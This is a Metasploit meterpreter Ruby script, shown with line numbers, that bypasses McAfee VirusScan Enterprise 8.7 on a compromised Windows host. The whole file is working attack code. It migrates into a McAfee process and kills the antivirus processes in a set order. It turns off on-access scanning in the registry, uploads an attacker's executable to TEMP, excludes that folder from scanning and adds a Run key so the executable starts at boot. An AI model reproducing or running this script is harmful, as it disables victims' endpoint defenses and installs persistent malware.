Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
9
# order which keeps VirusScan icon visible at system tray without disabled sign on it.
10
# Additionally it lets you disable On Access Scanner from registry, upload your detectable
11
# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run
12
# registry key. (Requires administrator privilege. Tested on XP SP3)
13
#
14
# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)
15
#
16
# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com
17

18
session = client
19
@@exec_opts = Rex::Parser::Arguments.new(
20
  "-h" => [ false,"Help menu." ],
21
  "-k" => [ false,"Only kills VirusScan processes"],
22
  "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]
23
)
24

25
################## function declaration Declarations ##################
26
def usage()
27
  print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"
28
  print_line "----------------------------------------------------------------------------------------------"
29
  print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"
30
  print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"
31
  print_line "----------------------------------------------------------------------------------------------"
32
  print_line(@@exec_opts.usage)
33
end
34

35
@path = ""
36
@location = ""
37

38
def upload(session,file,trgloc)
39
  if not ::File.exist?(file)
40
    raise "File to Upload does not exist!"
41
  else
42
    @location = session.sys.config.getenv('TEMP')
43
    begin
44
      ext = file.scan(/\S*(.exe)/i)
45
      if ext.join == ".exe"
46
        fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
47
      else
48
        fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
49
      end
50
      @path = fileontrgt
51
      print_status("Uploading #{file}....")
52
      session.fs.file.upload_file("#{fileontrgt}","#{file}")
53
      print_status("Uploaded as #{fileontrgt}")
54
    rescue ::Exception => e
55
      print_status("Error uploading file #{file}: #{e.class} #{e}")
56
    end
57
  end
58
  return fileontrgt
59
end
60

61
#parsing of Options
62
file = ""
63
helpcall = 0
64
killonly = 0
65
@@exec_opts.parse(args) { |opt, idx, val|
66
  case opt
67
  when "-e"
68
    file = val || ""
69
  when "-h"
70
    helpcall = 1
71
  when "-k"
72
    killonly = 1
73
  end
74

75
}
76

77
if killonly == 0
78
  if file == ""
79
    usage
80
    raise Rex::Script::Completed
81
  end
82
end
83

84
# Magic kill order :)
85
avs = %W{
86
  shstat.exe
87
  engineserver.exe
88
  frameworkservice.exe
89
  naprdmgr.exe
90
  mctray.exe
91
  mfeann.exe
92
  vstskmgr.exe
93
  mcshield.exe
94
}
95

96
av = 0
97

98
plist = client.sys.process.get_processes()
99
plist.each do |x|
100
  if (avs.index(x['name'].downcase))
101
    av = av + 1
102
  end
103
end
104

105

106
if av > 6
107
  print_status("VirusScan Enterprise v8.7.0i+ is running...")
108
else
109
  print_status("VirusScan Enterprise v8.7.0i+ is not running!")
110
  raise Rex::Script::Completed
111
end
112

113
target_pid = nil
114
target ||= "mfevtps.exe"
115

116
print_status("Migrating to #{target}...")
117

118
# Get the target process pid
119
target_pid = client.sys.process[target]
120

121
if not target_pid
122
  print_error("Could not access the target process")
123
  raise Rex::Script::Completed
124
end
125

126
print_status("Migrating into process ID #{target_pid}")
127
client.core.migrate(target_pid)
128

129
target_pid = nil
130

131
if killonly == 1
132
  avs.each do |x|
133
    # Get the target process pid
134
    target_pid = client.sys.process[x]
135
    print_status("Killing off #{x}...")
136
    client.sys.process.kill(target_pid)
137
  end
138
else
139
  avs.each do |x|
140
    # Get the target process pid
141
    target_pid = client.sys.process[x]
142
    print_status("Killing off #{x}...")
143
    client.sys.process.kill(target_pid)
144
  end
145

146
  # Upload it
147
  exec = upload(session,file,"")
148

149
  # Initiailze vars
150
  key   = nil
151
  value = nil
152
  data  = nil
153
  type  = nil
154

155
  # Mcafee registry key
156
  key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'
157

158
  # Split the key into its parts
159
  root_key, base_key = client.sys.registry.splitkey(key)
160

161
  # Disable when writing to disk option
162
  value = "bScanIncoming"
163
  data = 0
164
  type = "REG_DWORD"
165
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
166
  open_key.set_value(value, client.sys.registry.type2str(type), data)
167
  print_status("Successful set #{key} -> #{value} to #{data}.")
168

169
  # Disable when reading from disk option
170
  value = "bScanOutgoing"
171
  data = 0
172
  type = "REG_DWORD"
173
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
174
  open_key.set_value(value, client.sys.registry.type2str(type), data)
175
  print_status("Successful set #{key} -> #{value} to #{data}.")
176

177
  # Disable detection of unwanted programs
178
  value = "ApplyNVP"
179
  data = 0
180
  type = "REG_DWORD"
181
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
182
  open_key.set_value(value, client.sys.registry.type2str(type), data)
183
  print_status("Successful set #{key} -> #{value} to #{data}.")
184

185
  # Increase the number of excluded items
186
  value = "NumExcludeItems"
187
  data = 1
188
  type = "REG_DWORD"
189
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
190
  open_key.set_value(value, client.sys.registry.type2str(type), data)
191
  print_status("Successful set #{key} -> #{value} to #{data}.")
192

193
  # Add executable to excluded item folder
194
  value = "ExcludedItem_0"
195
  data = "3|3|" + @location
196
  type = "REG_SZ"
197
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
198
  open_key.set_value(value, client.sys.registry.type2str(type), data)
199
  print_status("Successful set #{key} -> #{value} to #{data}.")
200

201
  # Set registry to run executable at startup
202
  key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
203
  # Split the key into its parts
204
  root_key, base_key = client.sys.registry.splitkey(key)
205
  value = "MS"
206
  data = @path
207
  open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
208
  open_key.set_value(value, client.sys.registry.type2str(type), data)
209
  print_status("Successful set #{key} -> #{value} to #{data}.")
210
end
211

212
print_status("Finished!")
213

214